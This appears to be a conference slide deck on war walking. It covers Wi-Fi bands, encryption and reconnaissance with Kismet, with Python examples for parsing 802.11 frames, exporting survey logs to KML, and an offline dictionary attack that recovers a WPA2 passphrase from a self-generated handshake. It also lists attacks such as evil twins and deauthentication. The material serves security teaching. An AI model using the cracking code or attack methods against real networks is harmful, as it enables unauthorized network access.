
War Walking

by Nirav Goti
Who am I?
I am an InfoSec guy...
who is into Web, Thick client, Thin client, IoT, wireless and Forensics.
Agenda
● Wireless communication
● Different types and bands of 802.11
● Wireless pentesting
● Wireless states
● 802.11 Terminologies
● War Walking
● Requirements
● Kismet
● Demo
Wireless Communication (802.11)
● Who defines the bands?
○ The ITU Radio Regulations allocate spectrum internationally; national regulators (FCC, ETSI and others) fix the exact channels and power limits for their region, which is why channel 12-14 availability differs by country.
● Bands (ISM and UNII): these are frequency bands, not modulation schemes.
○ ISM - Industrial, Scientific and Medical:-
■ Radio bands reserved internationally for industrial, scientific and medical uses of RF energy other than telecommunications. Unlicensed devices (802.11b/g/n, Bluetooth, microwave ovens) share the 2.4 GHz ISM band, which is why it is noisy.
○ UNII - Unlicensed National Information Infrastructure:-
■ The 5 GHz part of the spectrum used by IEEE 802.11a/n/ac devices and by many wireless ISPs.
Bands (ISM and UNII)
ISM - Industrial, Scientific and Medical (2.4 GHz)
● The entire band is only 100 MHz wide (2.400-2.500 GHz), so the 11 channels used in the US (13 in most other regions) have to squeeze into it and, at 20-22 MHz each, they overlap.
● If you are going to use 40 MHz channels, take into consideration that the airwaves may be congested: one 40 MHz channel takes almost half the band and collides with nearly every neighbour, unless you live in a house in the middle of a very large property.

Reference for more details


Bands (ISM and UNII)
ISM - Industrial, Scientific and Medical (2.4 GHz)
● For 802.11 the band is divided into 14 channels whose centre frequencies are 5 MHz apart (channel 1 = 2412 MHz); channel 14 (Japan only) sits 12 MHz above channel 13, at 2484 MHz.
● Each 802.11b channel is 22 MHz wide (20 MHz for 802.11g/n OFDM), so only 3 channels, 1, 6 and 11, can be used without overlapping.

Reference for more details


Bands (ISM and UNII)
UNII - Unlicensed National Information Infrastructure (5 GHz)
● It operates over four ranges inside U-NII: 5.150–5.850 GHz
● Channel centres are 20 MHz apart, so 20 MHz channels in the 5 GHz band do not overlap
● Divided in 4 parts:
○ U-NII-1: 5.150–5.250 GHz (channels 36–48)
○ U-NII-2A: 5.250–5.350 GHz (channels 52–64, DFS required)
○ U-NII-2C: 5.470–5.725 GHz (channels 100–144, DFS required)
○ U-NII-3: 5.725–5.850 GHz (channels 149–165)
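The channel arithmetic behind the last three slides, as an added example (not code from the original deck): centre frequencies follow the 5 MHz spacing rule above, the 22 MHz (802.11b) and 20 MHz (OFDM) channel widths and the U-NII sub-band edges are standard values rather than numbers from the slides, and the greedy picker reproduces why only 1, 6 and 11 are usable together in the US, why 1, 5, 9, 13 works with 20 MHz OFDM where 13 channels are allowed, and why 5 GHz channels never overlap.

```python
"""Centre frequencies and channel overlap for the 2.4 GHz ISM and 5 GHz
U-NII bands (added example; not from the original slides)."""

# Channel widths are standard values (not from the slides):
DSSS_WIDTH_MHZ = 22   # 802.11b
OFDM_WIDTH_MHZ = 20   # 802.11a/g/n/ac

# FCC U-NII sub-band edges in MHz (standard values, not from the slides)
UNII_SUBBANDS = {
    "U-NII-1": (5150, 5250),
    "U-NII-2A": (5250, 5350),
    "U-NII-2C": (5470, 5725),
    "U-NII-3": (5725, 5850),
}


def channel_center_mhz(channel: int) -> int:
    """Centre frequency of a 2.4 GHz (1-14) or 5 GHz (36-177) channel."""
    if 1 <= channel <= 13:
        return 2407 + 5 * channel       # 5 MHz spacing, channel 1 = 2412 MHz
    if channel == 14:
        return 2484                     # Japan only: 12 MHz above channel 13
    if 36 <= channel <= 177:
        return 5000 + 5 * channel       # channel 36 = 5180 MHz
    raise ValueError(f"unknown 802.11 channel {channel}")


def channels_overlap(a: int, b: int, width_mhz: int = DSSS_WIDTH_MHZ) -> bool:
    """True when two channels of the given width share any spectrum."""
    return abs(channel_center_mhz(a) - channel_center_mhz(b)) < width_mhz


def non_overlapping_set(channels, width_mhz: int = DSSS_WIDTH_MHZ) -> list:
    """Greedy pick, lowest channel first, of channels that do not overlap."""
    chosen = []
    for ch in sorted(channels):
        if all(not channels_overlap(ch, c, width_mhz) for c in chosen):
            chosen.append(ch)
    return chosen


def unii_subband(channel: int):
    """Name of the U-NII sub-band a 5 GHz channel falls in, else None."""
    f = channel_center_mhz(channel)
    for name, (lo, hi) in UNII_SUBBANDS.items():
        if lo <= f < hi:
            return name
    return None


if __name__ == "__main__":
    print("2.4 GHz, 22 MHz DSSS, US channels 1-11:",
          non_overlapping_set(range(1, 12)))                      # [1, 6, 11]
    print("2.4 GHz, 20 MHz OFDM, channels 1-13:",
          non_overlapping_set(range(1, 14), OFDM_WIDTH_MHZ))      # [1, 5, 9, 13]
    print("5 GHz U-NII-1, 20 MHz:",
          non_overlapping_set([36, 40, 44, 48], OFDM_WIDTH_MHZ))  # [36, 40, 44, 48]
    for ch in (36, 52, 100, 149):
        print(ch, channel_center_mhz(ch), "MHz", unii_subband(ch))
```

When Kismet later reports an AP on channel 3 or 8, this is the reason its traffic bleeds into the captures on 1/6 and 6/11: the centre is only 10 MHz from the neighbour while the channel is 20-22 MHz wide.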
Different types and bands of 802.11
● Bands (ISM and UNII)
● 802.11 Standards and Bands
● Channels
● Cryptography
802.11 Standards and Bands
802.11 refers to a family of specifications developed by the IEEE for WLAN (not to be confused with 802.1X, the port-based authentication standard behind WPA-Enterprise).

Over 2.4 GHz (ISM band): 802.11b, 802.11g and 802.11n.

Over 5 GHz (UNII band): 802.11a, 802.11n and 802.11ac (802.11n runs in both bands).

Outside those two bands: 802.11ad runs at 60 GHz and 802.11af in the TV white spaces below 1 GHz; a normal 2.4/5 GHz adapter will not see either.
802.11 Standards and Bands
ISM - Industrial, scientific and medical
802.11 Standards and Bands
UNII - Unlicensed National Information Infrastructure
Channels
A WiFi channel is the slice of a band's frequency range on which an AP and its stations send and receive frames. Both sides must be tuned to the same channel to hear each other, and a sniffer sees only one channel at a time unless it hops between them.

[Figure: sender → channel (drawn as a carrier pigeon) → receiver]
Channels
ISM - Industrial, scientific and medical
Channels
ISM - Industrial, scientific and medical
Channels
UNII - Unlicensed National Information Infrastructure
802.11 Cryptography

Having a security protocol over the wireless link is a must because of the sensitive information that is conveyed over it: emails, banking applications, payment gateways, etc.

Wireless security protocols were developed to protect home/business WLANs.

These wireless security protocols are WEP, WPA, WPA2 and WPA3, each with its own strengths and weaknesses:
● WEP: RC4 with a 24-bit IV; the key is recovered in minutes from captured traffic. Treat it as no encryption.
● WPA: TKIP on top of RC4, a stop-gap so WEP hardware could be patched; deprecated.
● WPA2: AES-CCMP; sound when the pre-shared key is strong, but the 4-way handshake can be captured and the PSK brute-forced offline.
● WPA3: SAE (Dragonfly) replaces the PSK handshake, so a captured handshake no longer gives an offline dictionary attack.
Reference for more info...
802.11 Cryptography
Wireless Pentesting
● Scanning
● Enumeration (investigate rogue devices)
● Testing the targeted APs
● Gaining Access
Wireless Pentesting
● Bypassing WLAN Authentication – Shared Key, MAC Filtering, Hidden SSIDs
● Cracking WLAN Encryption – WEP, WPA/WPA2 Personal and Enterprise, understanding encryption-based flaws (WEP, TKIP, CCMP)
● Attacking the WLAN Infrastructure – Rogue Devices, Evil Twins, DoS Attacks, MITM, Wi-Fi Protected Setup (WPS)
● Advanced Enterprise Attacks – 802.1X, EAP, LEAP, PEAP, EAP-TTLS
● Attacking the Wireless Client – Honeypots and Hotspot attacks, Caffe Latte, Hirte, Ad-Hoc Networks and Viral SSIDs, WiFishing
● Enterprise Wi-Fi Worms, Backdoors and Botnets
Wireless states
Access Point (AP): continuously broadcasts beacon frames announcing its SSID, channel and capabilities.

Clients (stations): continuously send probe requests looking for APs, often naming networks they have joined before; APs answer with probe responses.

Authentication: the station proves its right to use the AP (open system, or shared key in WEP); it is followed by association, after which the WPA/WPA2 4-way handshake derives the session keys.

Stations: devices looking for open or pre-authorized APs.

A station moves through three 802.11 states: unauthenticated and unassociated, authenticated but unassociated, and authenticated and associated. A deauthentication or disassociation frame pushes it back down, which is what deauth attacks use to force a fresh handshake.
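What a passive sniffer actually extracts from the beacons and probe requests described above, as an added example (not code from the original deck): a minimal parser for 802.11 management frames that pulls out the BSSID, the ESSID (or notes that it is hidden), the channel from the DS Parameter Set, the privacy bit and the RSN element's cipher and AKM, plus the SSIDs each client asks for in directed probes. The frames are constructed by the script itself with invented MAC addresses; nothing is captured from a real network.

```python
"""Parse 802.11 beacon and probe-request frames into the fields a war-walking
sniffer records: BSSID, ESSID (or hidden), channel, privacy bit and the RSN
element that says WPA2/WPA3 and which cipher and AKM are in use.
Added example, not code from the original slides; the frames are built by the
script itself (constructed, not captured)."""
import struct

CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP", 5: "WEP-104"}   # RSN cipher suite selectors
AKMS = {1: "802.1X", 2: "PSK", 8: "SAE"}                       # RSN AKM suite selectors
BROADCAST = b"\xff" * 6


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_ies(data: bytes) -> dict:
    """Split the tagged-parameter area into {element id: value}."""
    ies, i = {}, 0
    while i + 2 <= len(data):
        tag, length = data[i], data[i + 1]
        ies[tag] = data[i + 2:i + 2 + length]
        i += 2 + length
    return ies


def parse_rsn(ie: bytes) -> dict:
    """Decode the RSN element (id 48): group cipher, pairwise ciphers, AKMs."""
    group = ie[2:6]                                    # follows the 2-byte version
    count, = struct.unpack_from("<H", ie, 6)
    pairwise = [ie[8 + 4 * k:12 + 4 * k] for k in range(count)]
    off = 8 + 4 * count
    count, = struct.unpack_from("<H", ie, off)
    akms = [ie[off + 2 + 4 * k:off + 6 + 4 * k] for k in range(count)]
    return {"group": CIPHERS.get(group[3], "?"),
            "pairwise": [CIPHERS.get(s[3], "?") for s in pairwise],
            "akm": [AKMS.get(a[3], "?") for a in akms]}


def parse_mgmt_frame(frame: bytes) -> dict:
    fc, = struct.unpack_from("<H", frame, 0)
    if (fc >> 2) & 0x3 != 0:
        raise ValueError("not a management frame")
    subtype = (fc >> 4) & 0xF
    addr2, addr3 = frame[10:16], frame[16:22]          # SA, BSSID
    body = frame[24:]
    if subtype == 8:                                   # beacon
        _timestamp, _interval, cap = struct.unpack_from("<QHH", body, 0)
        ies = parse_ies(body[12:])
        ssid = ies.get(0, b"")
        hidden = not ssid.strip(b"\x00")               # empty or null-filled SSID
        return {"type": "beacon", "bssid": mac_str(addr3),
                "ssid": None if hidden else ssid.decode("utf-8", "replace"),
                "hidden": hidden,
                "channel": ies[3][0] if 3 in ies else None,   # DS Parameter Set
                "privacy": bool(cap & 0x0010),         # capability "privacy" bit
                "rsn": parse_rsn(ies[48]) if 48 in ies else None}
    if subtype == 4:                                   # probe request
        ssid = parse_ies(body).get(0, b"")
        return {"type": "probe-req", "station": mac_str(addr2),
                "probed_ssid": ssid.decode("utf-8", "replace") or None}
    return {"type": f"mgmt-subtype-{subtype}"}


# ---- constructed frames standing in for a capture -------------------------
def make_ie(tag: int, value: bytes) -> bytes:
    return bytes([tag, len(value)]) + value


RSN_WPA2_PSK_CCMP = (b"\x01\x00"                        # version 1
                     + b"\x00\x0f\xac\x04"              # group cipher CCMP
                     + b"\x01\x00" + b"\x00\x0f\xac\x04"   # 1 pairwise cipher: CCMP
                     + b"\x01\x00" + b"\x00\x0f\xac\x02"   # 1 AKM: PSK
                     + b"\x00\x00")                     # RSN capabilities


def build_beacon(bssid: bytes, ssid: bytes, channel: int, rsn: bytes = b"") -> bytes:
    hdr = struct.pack("<HH", 0x0080, 0) + BROADCAST + bssid + bssid + b"\x00\x00"
    cap = 0x0411 if rsn else 0x0401                    # ESS, plus privacy when encrypted
    fixed = struct.pack("<QHH", 0, 100, cap)           # timestamp, interval, capabilities
    ies = make_ie(0, ssid) + make_ie(1, b"\x82\x84\x8b\x96") + make_ie(3, bytes([channel]))
    return hdr + fixed + ies + (make_ie(48, rsn) if rsn else b"")


def build_probe_request(station: bytes, ssid: bytes = b"") -> bytes:
    hdr = struct.pack("<HH", 0x0040, 0) + BROADCAST + station + BROADCAST + b"\x00\x00"
    return hdr + make_ie(0, ssid) + make_ie(1, b"\x82\x84\x8b\x96")


def inventory(frames) -> dict:
    """What a passive scan learns: APs keyed by BSSID, and which SSIDs each
    client asks for (directed probes leak the networks a device trusts)."""
    aps, clients = {}, {}
    for f in map(parse_mgmt_frame, frames):
        if f["type"] == "beacon":
            aps[f["bssid"]] = f
        elif f["type"] == "probe-req" and f["probed_ssid"]:
            clients.setdefault(f["station"], set()).add(f["probed_ssid"])
    return {"aps": aps, "clients": clients}
```

The probe-request half is the part worth remembering during a war walk: a client that keeps probing for "HomeNet" or "CoffeeShop" can be lured onto an evil twin of that name, which is the mechanism behind the honeypot and WiFishing attacks listed on the pentesting slide.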


802.11 Terminologies
BSSID: MAC address of the AP's radio (an AP serving several SSIDs or bands has several BSSIDs).

ESSID/SSID: the human-readable name of the network.

Signal Strength: strength of the received signal (RSSI, usually reported in dBm), which depends on distance and obstacles.

Handshake: the 4-way handshake between client and AP that proves both sides know the PMK and derives the session keys; a captured WPA/WPA2 handshake is what an offline PSK attack runs against.
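The handshake just defined and the WPA2 weakness noted on the cryptography slide, worked through as an added example (not code from the original deck): PBKDF2 turns passphrase and SSID into the PMK, PRF-512 turns PMK, both MACs and both nonces into the PTK, and the KCK (first 128 bits of the PTK) signs message 2 of the 4-way handshake with an HMAC-SHA1 MIC. Because every input except the passphrase is visible on the air, a captured message 2 lets an attacker test guesses offline; the script generates the "captured" frame itself from a known passphrase and invented MAC addresses and nonces, then recovers it from a small wordlist.

```python
"""WPA2-PSK key derivation, the 4-way handshake MIC, and the offline
dictionary attack a captured handshake enables (added example, not from
the original slides). The handshake here is generated by the script
itself with a known passphrase; nothing is captured from a real network."""
import hashlib
import hmac
import struct

NONCE_OFFSET = 17   # SNonce inside an EAPOL-Key frame (offsets include the 4-byte EAPOL header)
MIC_OFFSET = 81     # MIC field, 16 bytes


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    The SSID is the salt, so a table precomputed for one SSID is useless for another."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus both MAC addresses and both nonces (all sent in clear)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac) +
            min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): first 16 bytes of HMAC-SHA1 under the KCK."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16, key_data: bytes = b"") -> bytes:
    """EAPOL-Key message 2 of 4 (client -> AP) carrying the given MIC field."""
    body = (struct.pack(">BHHQ", 2, 0x010A, 16, 1)   # RSN descriptor, key info, key length, replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + mic + struct.pack(">H", len(key_data)) + key_data)
    return struct.pack(">BBH", 1, 3, len(body)) + body   # EAPOL v1, type 3 = EAPOL-Key


def simulate_handshake_capture(passphrase, ssid, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """Play the client's side and return message 2 as a sniffer would see it."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    frame = build_eapol_msg2(snonce, key_data=b"\x30\x02\x01\x00")   # constructed stub RSN IE
    mic = eapol_mic(ptk[:16], frame)                                   # KCK = PTK[0:16]
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_psk(ssid, ap_mac, sta_mac, anonce, msg2, wordlist):
    """Offline attack: recompute the MIC for each candidate passphrase and compare."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + b"\x00" * 16 + msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        ptk = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], zeroed), captured_mic):
            return candidate
    return None


# Constructed demo values (invented; not from any real network)
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("aabbccddeeff")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
SSID = "CorpWiFi"


def demo():
    msg2 = simulate_handshake_capture("correct horse", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, msg2,
                     ["password", "letmein", "correct horse", "hunter2"])


if __name__ == "__main__":
    print("recovered passphrase:", demo())   # correct horse
```

Each guess costs 4096 HMAC-SHA1 iterations, which is the only thing slowing the attacker down; a long random PSK, or WPA3's SAE, is what actually stops it. The PBKDF2 step can be checked against the IEEE 802.11i test vector: passphrase "password" with SSID "IEEE" gives the PMK f42c6fc5…a12e.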


War Walking
When a person walks through an infrastructure on foot investigating the wireless traffic, that process is called war walking.

This process collects the details needed to plan the attack on the infrastructure through its wireless devices: which APs and clients are present, their channels, encryption, signal strength and, with GPS, their location.
What is war driving?
The same survey carried out from a moving vehicle; war walking is its on-foot version, slower but able to get inside buildings where a car cannot go.
Requirements
ALFA card (wireless adaptor that supports monitor mode)

Laptop / Raspberry Pi (running Kismet)

GPS receiver (optional, but needed if you want to map the results with giskismet later)

Note: this setup covers only 802.11 (Wi-Fi) and 802.15 (Bluetooth / Zigbee) captures.


Kismet
Kismet is a wireless sniffing tool: it listens passively in monitor mode and does not transmit.

It is available in Kali by default.

Uninstall it.
Kismet
Because the Kismet packaged by default does not cover all the bases; the next slides build the current version from git instead.

And
Kismet
● git clone https://www.kismetwireless.net/git/kismet.git
● sudo apt-get install build-essential git libmicrohttpd-dev zlib1g-dev libnl-3-dev libnl-genl-3-dev libcap-dev libpcap-dev libncurses5-dev libnm-dev libdw-dev libsqlite3-dev protobuf-c-compiler libprotobuf-c-dev libusb-1.0-0 libusb-1.0-0-dev protobuf-compiler
● cd kismet
● ./configure
● make
● sudo make suidinstall
● sudo usermod -a -G kismet <YourUsername>
● Log out and back in so the new group membership takes effect, then run kismet as your own user: suidinstall only makes the capture helpers (kismet_cap_*) setuid root, restricted to the kismet group, so the rest of Kismet never runs as root.
Kismet
● https://github.com/binkybear/kismet_web_viewer
○ pip install -r requirements.txt
○ python app.py
● https://tools.kali.org/wireless-attacks/giskismet
○ giskismet -x Kismet-<blah-blah>.netxml (imports a legacy Kismet .netxml log, including its GPS coordinates, into a local SQLite database)
○ giskismet -q "SELECT * FROM wireless" -o all.kml (queries that database and writes the result as KML for Google Earth; narrow the WHERE clause to map only open or WEP networks)
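The step giskismet performs above, as an added example (not giskismet's code and not from the original deck): parse a survey log, pick out the open and WEP networks that go at the top of the report, and write the mapped networks out as KML. The log is constructed inline to resemble the legacy Kismet .netxml layout (wireless-network, SSID/encryption/essid, BSSID, channel, gps-info); its networks, MAC addresses and coordinates are invented.

```python
"""Triage a Kismet .netxml survey log and export it as KML, the step the
giskismet commands above perform (added example, not giskismet's own code).
The log below is constructed to resemble the legacy Kismet netxml layout;
the networks, coordinates and MAC addresses in it are invented."""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SAMPLE_NETXML = """<detection-run kismet-version="2016.07.R1" start-time="Sat Jan  1 10:00:00 2022">
<wireless-network number="1" type="infrastructure">
  <SSID><type>Beacon</type><encryption>WPA+PSK</encryption><encryption>WPA+AES-CCM</encryption>
    <essid cloaked="false">CorpWiFi</essid></SSID>
  <BSSID>00:11:22:33:44:55</BSSID><channel>6</channel>
  <snr-info><max_signal_dbm>-41</max_signal_dbm></snr-info>
  <gps-info><peak-lat>51.500100</peak-lat><peak-lon>-0.120100</peak-lon></gps-info>
</wireless-network>
<wireless-network number="2" type="infrastructure">
  <SSID><type>Beacon</type><encryption>WEP</encryption><essid cloaked="false">Printer-Net</essid></SSID>
  <BSSID>66:77:88:99:aa:bb</BSSID><channel>11</channel>
  <snr-info><max_signal_dbm>-67</max_signal_dbm></snr-info>
  <gps-info><peak-lat>51.500400</peak-lat><peak-lon>-0.120600</peak-lon></gps-info>
</wireless-network>
<wireless-network number="3" type="infrastructure">
  <SSID><type>Beacon</type><encryption>None</encryption><essid cloaked="true"></essid></SSID>
  <BSSID>cc:dd:ee:ff:00:11</BSSID><channel>1</channel>
  <snr-info><max_signal_dbm>-80</max_signal_dbm></snr-info>
  <gps-info><peak-lat>51.500900</peak-lat><peak-lon>-0.121300</peak-lon></gps-info>
</wireless-network>
</detection-run>
"""


def parse_netxml(text: str) -> list:
    """One dict per wireless-network element: identity, channel, encryption, signal, fix."""
    nets = []
    for n in ET.fromstring(text).iter("wireless-network"):
        ssid = n.find("SSID")
        essid = ssid.find("essid") if ssid is not None else None
        gps = n.find("gps-info")
        nets.append({
            "bssid": n.findtext("BSSID"),
            "essid": (essid.text or "") if essid is not None else "",
            "cloaked": essid is not None and essid.get("cloaked") == "true",
            "channel": int(n.findtext("channel", "0")),
            "encryption": [e.text for e in ssid.iter("encryption")] if ssid is not None else [],
            "signal_dbm": int(n.findtext("snr-info/max_signal_dbm", "-100")),
            "lat": float(gps.findtext("peak-lat")) if gps is not None else None,
            "lon": float(gps.findtext("peak-lon")) if gps is not None else None,
        })
    return nets


def weak_networks(nets: list) -> list:
    """Open or WEP networks: the first findings to report from a war walk."""
    return [n for n in nets
            if not n["encryption"] or "None" in n["encryption"] or "WEP" in n["encryption"]]


def to_kml(nets: list) -> str:
    """One Placemark per network that has a GPS fix (KML wants lon,lat order)."""
    marks = []
    for n in nets:
        if n["lat"] is None:
            continue
        name = n["essid"] or f"<hidden> {n['bssid']}"
        desc = f"{n['bssid']} ch {n['channel']} {'/'.join(n['encryption'])} {n['signal_dbm']} dBm"
        marks.append(f"<Placemark><name>{escape(name)}</name>"
                     f"<description>{escape(desc)}</description>"
                     f"<Point><coordinates>{n['lon']},{n['lat']},0</coordinates></Point></Placemark>")
    return ('<?xml version="1.0" encoding="UTF-8"?>\n'
            '<kml xmlns="http://www.opengis.net/kml/2.2"><Document>'
            + "".join(marks) + "</Document></kml>")


if __name__ == "__main__":
    networks = parse_netxml(SAMPLE_NETXML)
    for n in weak_networks(networks):
        print("weak:", n["bssid"], n["essid"] or "<hidden>", n["encryption"])
    with open("all.kml", "w") as fh:
        fh.write(to_kml(networks))
```

The peak-lat/peak-lon pair is the position where the strongest signal was seen, which is closer to the AP than the average of every fix along the walk; that is the coordinate worth plotting when the goal is to find a rogue device.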
Thank you!
Any Questions?
